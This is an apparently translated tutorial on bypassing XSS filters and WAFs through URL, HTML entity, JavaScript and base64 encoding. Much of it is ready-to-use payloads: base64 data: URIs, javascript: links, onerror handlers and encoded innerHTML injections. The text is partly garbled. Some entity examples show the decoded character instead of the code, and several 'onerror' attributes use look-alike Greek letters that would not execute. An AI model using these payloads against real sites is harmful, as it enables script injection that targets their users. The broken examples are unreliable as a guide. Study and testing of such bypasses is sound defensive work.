xss encoding problem and bypass

Commonly used encoding
URL encoding: a percent sign and the 2-digit hexadecimal number corresponding to the ASCII encoding of the character.
For example, the URL encoding of "/" is %2F

#:%23;. 

:%2e; 

+ :%2b; 

<:%3c; 

>: %3e; 

!:%21; 

Space:%20; 

&: %26; 

(:%28; 

): %29; 

":%22; 

':%27;

HTML entity encoding: beginning with & and ending with a semicolon. For example, the encoding of "<" is "<"
HTML entity encoding (decimal and hexadecimal)
such as "<" html decimal: < html hexadecimal: <

JavaScript encoding: js provides four character encoding strategies

Three octal digits, if not enough, add 0 in front, for example, "<" is encoded as "\074"
Two hexadecimal digits, if not enough, add 0 in front, for example, "<" is encoded as "\x3c"
Four hexadecimal digits, if not enough, add 0 in front, for example, "<" is encoded as "\u003c"
For some control characters, use special C-type escape styles (such as \n and \r)

The specific utilization scenarios of each code
(1) Base64 encoding
Data protocol usage data: resource type; encoding, content
So far, most of the cases where base64 encoding is used are like this

<a href="Controllable Point">
<iframe src="Controllable Point">

In this case, if you filter <> '"javascript, then you can write xss like this and use base64 encoding!

Encode the entire base64 of <img src= x οnerrοr=alert(1)> as:
PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==

Data protocol usage data: resource type; coding type, content

<script>alert(1)</script>
(<img src=1 οnerrοr=alert(1)> a标签,object,iframe不支持)
<a href=“data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>111</a>
<object data=“data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
（chrome不支持）
<iframe src=“data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></iframe>
(chrome,firefox支持)

<a>How to use tags

<a href=“data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>test</a>

In this way, when the test A link is clicked, the data protocol page will be parsed and coded into base64 in the way of html/text, and then
when the a link is clicked, the base64 code will be decoded and restored to our original

<script>alert(1)</script> Then the window pops up successfully!

Specific utilization scenarios of each code

(2) HTML entity encoding (decimal and hexadecimal)
browsers will not parse those encodings in js in html tags! Onerror is special. The content in onerror is parsed by js, so it can be encoded with JSunicode, but not all encodings can only encode function names. It will be wrong if all the coding is done.

Such as <img src=1 οnerrοr=
"\u0061\u006c\u0065\u0072\u0074(1)"> This kind of pop-up window.
\img src=1 οnerrοr=
“\u0061\u006c\u0065\u0072\u0074`1`”>

onerror support: html10, html16, jsunicode, js8 hexadecimal and js16 hexadecimal not supported

The semicolon in HTML decimal and hexadecimal encoding can be removed.
A lot of 0s can be added before the number of the entity code to bypass WAF. For
example, the following code can be successfully executed:

HTML5 new entity naming codes, such as
: => [colon] => [line feed]

如<a href=“javasc&NewLine;ript&colon;alert(1)”>click</a>
<a href=”javascript:alert(1)”>tan</a>

The parser generally distributes the work to two components-the lexical analyzer (sometimes called the tokenizer) is responsible for decomposing the input into legal symbols, and the parser analyzes the document structure according to the grammatical rules of the language to build a parse tree and lexical analysis The processor knows how to skip extraneous characters such as blanks and newlines.
<a href="javasc ript:alert(1)">click</a>

First, the html code is restored and then it becomes a line break and a colon
<a href="javascript:alert(1)">click</a>

Why can it be executed after line break is because the lexical analyzer in the browser will skip invalid characters such as blanks and line breaks. It must be enclosed in single and double quotation marks when wrapping, otherwise it will not be skipped. The carriage return and line feed are skipped, and the on event is not supported.
Then a complete statement
<a href="javascript:alert(1)">click</a> is successfully executed.

Specific utilization scenarios of each code

(3) Javascript encoding
Javascript pseudo-protocol can be used in the attribute value,
such as <a href="javascript:alert('xss')">111</a> click 111 to trigger a pop-up window. Only a few encodings are recognized in javascript: Jsunicode js8 hexadecimal js16 hexadecimal

The first case:
the value you enter is stored in a variable and then finally appears in a function that can execute the string as js code! Such as:

eval(), setTimeout(), setInterval()
above are all functions that will execute strings as js code!

The second case:

var search = “可控点”;
document.getElementById().innerHTML=search;

Many of the above situations appear after you search and then display the keywords
you query. If you filter <> '"&% and so on! Then output to the page! It
stands to reason that this is safe! But we enter Change the value to js encoding,
such as we change to <img src=x
οnerrοr=alert(1)> and then perform js octal encoding==>\74\151\155\147\40\163\162\143\75\ 170\40\157\156\145\162\162\157\162\75\141\154\145\162\164\50\61\51\76 and then after the server accepts it, no filter is found to be filtered Then we entered the innerHTML.
After js decoding, our code is restored and injected into the web page! At this time, the code is executed! Successful pop-up window!

(4) URL encoding
Javascript: URL encoding can be used behind the pseudo-protocol.
For example: <a href="javascript:%61lert(1)">click me</a> can successfully execute the pop-up window, but
img can't be used: <img src=x
οnerrοr=”javascript:%61lert(1)”>

Because the href attribute will jump to the URL in it, and the URL will be decoded. The onerror attribute will only execute JS, not jump.
At the same time, the following URL encoding can be done again with entity (HTML entity) encoding:
<a href=”javascript :%61lert(1)”>click me</a>